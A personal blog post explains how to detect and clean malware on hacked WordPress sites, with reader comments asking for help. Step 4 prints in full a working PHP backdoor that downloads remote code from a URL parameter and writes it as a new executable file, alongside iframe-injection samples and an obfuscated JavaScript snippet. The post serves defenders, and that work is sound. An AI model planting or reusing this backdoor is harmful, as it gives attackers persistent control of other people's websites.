Tweet
Gîrmacea blog Link to homepage

WordPress Virus and how to remove it

I have seen many type of viruses infecting wordpress blogs. You can check if your wordpress is infected by Right Clicking your blog homepage and select View Source. Start looking for the following types of code.

Iframe virus

<iframe src="http://virus-site" width="320" height="240"></iframe>

Usualy inserted at the end of your source code, after you close the html tag </html>

Search the source code for <iframe, in most cases your theme won’t have any IFRAME except the virus.

Encoded Javascript virus

javascript virus

Search for <script in your code and look for a lot of numbers. This are encoded characters that basicaly tell the browser to link or redirect to another website.

PHP Virus

<!--?php echo '<iframe src="http://virus-site...'; ?-->

This can be found in your index.php files of your website.

Removing the virus

  1. Change your FTP password immediatly!
  2. Search for the above codes in all your index.php files on your site (/index.php , /wp-admin/index.php , /wp-content/themes/[theme-name]/index.php etc.)
  3. Remove the virus lines of code
  4. Look for files that aren’t supposed to be in the wordpress structure. Example: /wp-content/upd.php and /wp-content/1012312asdasdsadas12321.php– This makes the hacker infect your website easily any time he wants just by accessing a specific URL of your blog. Here is the content of the file:
    <!--?php $file = $_GET['file']; $pass = $_GET['pass']; 
    $true = '92cc227532d17e56e07902b254dfad10'; 
    if ($pass == $true){ $ch = curl_init($file); 
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,true); 
    curl_setopt($ch, CURLOPT_HEADER, 0); 
    curl_setopt($ch, CURLOPT_TIMEOUT, 5); 
    $shell = curl_exec($ch); 
    curl_close($ch); 
    $tmp = md5(rand(0,10000)); 
    $f = fopen($tmp.'.php',"w"); 
    fputs($f,$shell); 
    fclose($f); 
    header("Location: $tmp.php"); } ?-->
  5. Check /wp-includes/js/jquery/jquery.js and all the other .js files. At the end of the file there might be something like:

    var _0x473c=["\x6E\x20\x71\x28\x29\x7B\x33\x3D\x30\x2E
    \x62\x28\x27\x64\x27\x29\x3B\x33\x2E\x63\x3D\x27\x70\x3A\x2F\x2F\
    ...
    

I can help you remove the virus for free

If you have a personal blog and you think you have a virus, I can help you remove it for a link, beer or just a simple thank you.

6 responses to “WordPress Virus and how to remove it”

  1. David Pope says:

    Trying to complete my website, when i do a google search to check if my website is indexed “www.onlinesafety-training.com” 5 results show up, when i scroll down and click the show ommited results a few extra pages shows up including http://www.onlinesafety-training.com/wp-includes/js/jquer...
    Can you tell me if this a Virus, and how i could fix Please

  2. Marian Tatar says:

    Foarte util acest articol :) și e super că ajuți oamenii ! Felicitările mele !

  3. John Voce says:

    Hi.
    I have a number of sites on a VPS.

    They are resetting to ‘My CMS’ (Site Name) regularly!!

    As a result I loose ‘multisite’ installs, as the config file removes the multisite permission codes.

    Do you know if this is a virus, please?

    your help much appreciated.

    Regards

    John Voce. UK.

  4. Hi Girmacea,

    I need your help to remove a virus sir. You get a thank you, a link, a beer (is there a online beersupplydealer in Romania? arning: Cannot modify header information – headers already sent by (output started at /home2/mostafa/public_html/meesterversierder.nl/index.php:6) in /home2/mostafa/public_html/meesterversierder.nl/wp-includes/pluggable.php on line 896

    Its probably just some stupid JavaScriptcode.

    Isn’t that super?

    Cheers,

    Pim

  5. Lucas says:

    Dear Gîrmacea, thanks for sharing. Do you have any idea how someone can hack the javascript files resting on our servers? Does he has to gain access by some infected plugin or is there another way?

Leave a Reply

Gîrmacea, ... Răzvan Gîrmacea

Razvan Girmacea
For faster blog fixing, I may require your FTP data. Read more about me.